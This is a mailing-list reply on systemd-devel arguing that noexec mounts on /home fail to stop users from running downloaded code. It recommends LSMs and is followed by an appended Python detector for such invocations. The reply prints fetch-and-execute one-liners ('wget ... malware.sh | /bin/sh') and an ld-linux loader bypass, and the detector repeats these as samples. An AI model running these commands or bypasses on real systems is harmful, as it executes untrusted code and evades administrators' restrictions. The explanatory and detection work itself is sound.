[systemd-devel] Mount options of /var/run/users/<pid>
Simon McVittie
simon.mcvittie at collabora.co.uk
Mon Feb 16 11:16:12 PST 2015
On 16/02/15 18:14, Павел Самсонов wrote:
> If I have multiuser Linux installation with shell and DE access, my
> users have not places in system, where they able download something from
> internet and execute:
...
> /home rw,noexec

noexec is not sufficient to do what you have said. For instance, your
users could do any of these:

    wget http://example.com/malware.sh
    /bin/sh malware.sh

    wget -O - http://example.com/malware.sh | /bin/sh

    wget http://example.com/malware.x86.bin
    /lib/ld-linux.so.2 malware.x86.bin

(Or replace /bin/sh with Python, Perl etc., or the x86 executable with
any architecture your machine can run.)

Users who can execute arbitrary code with their own privileges, and
obtain arbitrary files from the Internet, can execute arbitrary code
from the Internet with their own privileges. You are unlikely to be able
to avoid this without LSMs.

If you use an LSM (AppArmor, SELinux, etc.) and "confine" your users,
you might be able to achieve what you think you have already achieved.

--
Simon McVittie
Collabora Ltd. <http://www.collabora.com/>
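
A detection-side illustration of the invocation patterns listed in the message above, added here and not part of the original post: it flags exec events where a file on a noexec mount is passed as an operand to an interpreter or to the dynamic loader. The mount list, the event tuples and all function names are assumptions made for this example.

```python
import posixpath
import re

# Assumption: mount points that are mounted noexec on the monitored host.
NOEXEC_MOUNTS = ("/home", "/tmp", "/run/user")
INTERP_RE = re.compile(r"^(sh|bash|dash|python|perl)[\d.]*$")
LOADER_RE = re.compile(r"^ld-linux(-[\w-]+)?\.so\.\d+$")

def on_noexec(path, cwd):
    """Resolve path against cwd; return it if it lies on a noexec mount."""
    full = posixpath.normpath(posixpath.join(cwd, path))
    hit = any(full == m or full.startswith(m + "/") for m in NOEXEC_MOUNTS)
    return full if hit else None

def classify(cwd, argv):
    """Return 'kind:path' when a file on a noexec mount is handed to an
    interpreter or to the dynamic loader, else None."""
    prog = posixpath.basename(argv[0])
    if LOADER_RE.match(prog):
        kind, inline = "loader", set()
    elif INTERP_RE.match(prog):
        kind = "interpreter"
        inline = {"-e"} if prog.startswith("perl") else {"-c", "-m"}
    else:
        return None
    for arg in argv[1:]:
        if arg in inline:
            return None          # code passed inline, no file operand
        if not arg.startswith("-"):
            full = on_noexec(arg, cwd)
            return f"{kind}:{full}" if full else None
    return None                  # no file operand (e.g. code read from stdin)

# Constructed sample exec events: (working directory, argv).
EVENTS = [
    ("/home/alice", ["/bin/sh", "malware.sh"]),
    ("/home/alice", ["/lib/ld-linux.so.2", "malware.x86.bin"]),
    ("/home/alice", ["/bin/sh"]),                       # fed through a pipe
    ("/home/alice", ["/bin/sh", "-c", "ls"]),
    ("/home/alice", ["/usr/bin/python3", "/usr/lib/tool.py"]),
]

def scan(events):
    """Return the findings for every event that classify() flags."""
    return [f for f in (classify(c, a) for c, a in events) if f]

if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding)
```

The piped form from the message has no file operand, so this argv-based check returns nothing for it.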